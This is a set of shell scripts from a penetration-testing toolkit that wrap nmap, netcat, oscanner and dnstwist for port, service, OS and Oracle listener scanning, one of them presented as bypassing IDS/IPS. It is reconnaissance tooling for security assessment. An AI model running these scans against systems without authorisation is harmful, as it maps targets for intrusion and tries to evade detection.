--------------------------------------------------------------------------------
/oracle/scanner.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
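# Run oscanner in verbose mode against one Oracle listener and keep the output.
# Usage: scanner.sh HOST PORT
# Output (stdout and stderr) is shown and also written to
# oracle_scanner_HOST_PORT.txt in the current directory.
if [ $# -eq 2 ]; then
    # Quoted so host and port are not split or glob-expanded by the shell.
    oscanner -v -s "$1" -P "$2" 2>&1 | tee "oracle_scanner_${1}_${2}.txt"
else
    echo "Please provide the target host and port."
fi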
30 |
--------------------------------------------------------------------------------
/phishing/dnstwist.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2024 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
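# Run dnstwist for one domain name to list its look-alike permutations.
# Usage: dnstwist.sh DOMAIN
if [ $# -eq 1 ]; then
    # Quoted so the domain is passed through as a single, unexpanded argument.
    dnstwist "$1"
else
    echo "Please provide the target Domain name."
fi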
30 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-nc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
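# Probe every TCP port (1-65535) of one host with netcat in zero-I/O mode.
# Usage: tcp-ports-scan-full-delay-nc.sh HOST SECONDS
if [ $# -eq 2 ]; then
    # NOTE(review): -w sets netcat's connection timeout; the usage text calls
    # the second argument a scan delay, which is what -i controls. Confirm
    # which of the two is intended before relying on the pacing.
    nc -w "$2" -z -v "$1" 1-65535
else
    echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
fi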
29 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-fulltcpcon.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
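# Full-range TCP connect scan (-sT, -p-) with ports probed in order (-r) and
# a fixed delay between probes; only open ports are reported.
# Usage: tcp-ports-scan-full-delay-sequential-fulltcpcon.sh TARGET DELAY
if [ $# -eq 2 ]; then
    # A CIDR target contains '/', which would turn the -oA basename into a
    # path below a directory that does not exist; replace it with '_'.
    # NOTE(review): the other delay-sequential variants write to the same
    # basename, so their results for one target overwrite each other.
    out_base="tcp_ports_full_delay_sequential_${1//\//_}"
    nmap -sT -vv -r -p- --reason --open --scan-delay "$2" -oA "$out_base" "$1"
else
    echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
fi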
29 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
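# Full-range TCP connect scan (-sT, -p-) without host discovery (-Pn), ports
# probed in order (-r) with a fixed delay between probes.
# Usage: tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh TARGET DELAY
if [ $# -eq 2 ]; then
    # '/' in a CIDR target is not usable inside the -oA basename; map it to
    # '_' so the three output files land in the current directory.
    # NOTE(review): this basename is shared with the other delay-sequential
    # variants, so a later run against the same target replaces the files.
    result_name="tcp_ports_full_delay_sequential_${1//\//_}"
    nmap -sT -vv -r -p- --reason -Pn --open --scan-delay "$2" -oA "$result_name" "$1"
else
    echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
fi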
29 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
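# Full-range TCP SYN scan (-sS, -p-) without host discovery (-Pn), ports
# probed in order (-r) with a fixed delay between probes.
# Usage: tcp-ports-scan-full-delay-sequential-noping.sh TARGET DELAY
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 2 ]; then
    # Keep the -oA basename a plain file name even for CIDR targets.
    # NOTE(review): the basename matches the other delay-sequential variants,
    # so their output files for the same target collide.
    out_base="tcp_ports_full_delay_sequential_${1//\//_}"
    nmap -sS -vv -r -p- --reason -Pn --open --scan-delay "$2" -oA "$out_base" "$1"
else
    echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
fi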
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
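# Full-range TCP SYN scan (-sS, -p-), ports probed in order (-r) with a fixed
# delay between probes; only open ports are reported.
# Usage: tcp-ports-scan-full-delay-sequential.sh TARGET DELAY
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 2 ]; then
    # Replace '/' from a CIDR target so -oA gets a valid file basename.
    # NOTE(review): same basename as the other delay-sequential variants;
    # results for one target are overwritten between them.
    result_name="tcp_ports_full_delay_sequential_${1//\//_}"
    nmap -sS -vv -r -p- --reason --open --scan-delay "$2" -oA "$result_name" "$1"
else
    echo "Please provide the target IP address or an IP range and the scan delay time(seconds)."
fi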
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
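# Full-range TCP SYN scan (-sS, -p-) with the -T4 timing template, no host
# discovery (-Pn) and no DNS resolution (-n).
# Usage: tcp-ports-scan-full-fast-noping-nodns.sh TARGET
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 1 ]; then
    # A CIDR target contains '/', which cannot be part of the -oA basename;
    # substitute '_' so the output files are created in the current directory.
    out_base="tcp_ports_full_${1//\//_}"
    nmap -sS -n -Pn -vv -p- --reason --open -T4 -oA "$out_base" "$1"
else
    echo "Please provide the target IP address or an IP range."
fi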
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-maxrate-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
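# Full-range TCP SYN scan (-sS, -p-) without host discovery (-Pn), with the
# send rate capped by --max-rate.
# Usage: tcp-ports-scan-full-maxrate-noping.sh TARGET MAX_RATE
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 2 ]; then
    # Map '/' from a CIDR target to '_' so -oA receives a usable basename.
    # NOTE(review): tcp-ports-scan-full-maxrate.sh uses the same basename.
    result_name="tcp_ports_full_maxrate_${1//\//_}"
    nmap -sS -vv -p- -Pn --reason --open --max-rate "$2" -oA "$result_name" "$1"
else
    echo "Please provide the target IP address or an IP range and the max rate."
fi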
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-maxrate.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
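# Full-range TCP SYN scan (-sS, -p-) with the send rate capped by --max-rate;
# only open ports are reported.
# Usage: tcp-ports-scan-full-maxrate.sh TARGET MAX_RATE
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 2 ]; then
    # '/' in a CIDR target would make the -oA basename point into a missing
    # directory; use '_' instead.
    out_base="tcp_ports_full_maxrate_${1//\//_}"
    nmap -sS -vv -p- --reason --open --max-rate "$2" -oA "$out_base" "$1"
else
    echo "Please provide the target IP address or an IP range and the max rate."
fi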
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
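# Full-range TCP SYN scan (-sS, -p-) with DNS resolution disabled (-n).
# Usage: tcp-ports-scan-full-nodns.sh TARGET
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 1 ]; then
    # Keep the -oA basename free of '/' so CIDR targets still produce output.
    # NOTE(review): the noping variants of the full scan write to the same
    # tcp_ports_full_ basename.
    result_name="tcp_ports_full_${1//\//_}"
    nmap -sS -n -vv -p- --reason --open -oA "$result_name" "$1"
else
    echo "Please provide the target IP address or an IP range."
fi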
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
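# Full-range TCP SYN scan (-sS, -p-) without host discovery (-Pn) and without
# DNS resolution (-n).
# Usage: tcp-ports-scan-full-noping-nodns.sh TARGET
# The script insists on root before starting the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -eq 1 ]; then
    # Substitute '_' for '/' so a CIDR target yields a valid -oA basename.
    out_base="tcp_ports_full_${1//\//_}"
    nmap -sS -n -Pn -vv -p- --reason --open -oA "$out_base" "$1"
else
    echo "Please provide the target IP address or an IP range."
fi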
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
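# Full-range TCP SYN scan (-sS -p-) of one target with host discovery skipped
# (-Pn); DNS resolution is left enabled. Open ports only (--open), with the
# state reason (--reason); output goes to tcp_ports_full_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Wrong usage is an error: stderr plus a non-zero exit status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Root-run command: reject a target that nmap would read as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Replace '/' (CIDR notation) so the -oA prefix stays a plain file name.
out_prefix="tcp_ports_full_${target//\//_}"

nmap -sS -vv -p- -Pn --reason --open -oA "$out_prefix" "$target"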
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2023 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
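# Fast full-range TCP SYN scan (-sS -p-) of one target: no host discovery
# (-Pn), no DNS (-n), aggressive timing template (-T4) and
# --defeat-rst-ratelimit, which stops nmap from slowing down for targets that
# rate-limit their RST replies. Only open ports are reported (--open), so the
# closed/filtered inaccuracy that option can cause does not affect the listing.
# Output: tcp_ports_full_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would turn the target into an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Keep the output prefix a valid file name when the target is a CIDR range.
out_prefix="tcp_ports_full_${target//\//_}"

nmap -sS -n -Pn -vv -p- --reason --open -T4 --defeat-rst-ratelimit -oA "$out_prefix" "$target"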
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
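# Full-range TCP connect scan (-sT -p-) with service/version detection (-sV)
# of one target, no host discovery (-Pn), no DNS (-n), using the slow "polite"
# timing template (-T2). A connect scan completes the TCP handshake, so every
# probe of an open port appears as an accepted connection on the target.
# Output: tcp_ports_full_<target>.* (-oA), the same prefix the SYN-scan
# variants use, so results from those runs are overwritten.
# Usage: <script> <target IP or range>

# -sT itself works without raw sockets; the root check is kept as in the
# sibling scripts.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: refuse a target that nmap would parse as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# '/' in a CIDR range would break the -oA file name prefix.
out_prefix="tcp_ports_full_${target//\//_}"

nmap -sT -n -Pn -sV -vv -p- --reason --open -T2 -oA "$out_prefix" "$target"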
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
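# Full-range TCP SYN scan (-sS -p-) of one target with nmap's default host
# discovery and DNS resolution. Open ports only (--open), with the state
# reason (--reason); output goes to tcp_ports_full_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Fail visibly on wrong usage.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: do not let the target be taken as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# CIDR ranges contain '/', which cannot be part of the output file name.
out_prefix="tcp_ports_full_${target//\//_}"

nmap -sS -vv -p- --reason --open -oA "$out_prefix" "$target"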
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-ports-services-scan-top400-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
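# TCP SYN scan (-sS) of nmap's 400 most common ports (--top-ports 400) with
# service/version detection at full intensity (-sV --version-all) and OS
# detection (-O --osscan-guess). Host discovery is skipped (-Pn), timing is
# -T4, only open ports are shown (--open).
# Output: tcp_services_400_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan and OS detection.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would be parsed as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Make the -oA prefix a valid file name for CIDR targets.
out_prefix="tcp_services_400_${target//\//_}"

nmap -sS -sV -vv -O --osscan-guess --version-all -Pn --top-ports 400 --open -T4 -oA "$out_prefix" "$target"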
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-fast-scan-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2023 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
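# Service scan of a known list of open TCP ports: SYN scan (-sS) with -A (OS
# detection, version detection, default scripts, traceroute), --osscan-guess and
# --version-all, host discovery skipped (-Pn), timing -T4.
# Output: tcp_services_<target>.* (-oA).
# Usage: <script> <target IP or range> <comma-separated TCP ports>

# The script insists on root before running the SYN scan and OS detection.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 2 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 1>&2
    exit 1
fi

target=$1
ports=$2
# Runs as root: refuse a target that nmap would parse as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# '/' from CIDR notation is replaced so the output prefix is a plain file name.
out_prefix="tcp_services_${target//\//_}"

# -p"$ports" keeps the whole port list attached to -p even if it contains spaces.
nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$ports" -T4 -oA "$out_prefix" "$target"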
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-scan-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2021 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
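# Service scan of a known list of open TCP ports at nmap's default timing:
# SYN scan (-sS) with -A (OS detection, version detection, default scripts,
# traceroute), --osscan-guess and --version-all, host discovery skipped (-Pn).
# Output: tcp_services_<target>.* (-oA).
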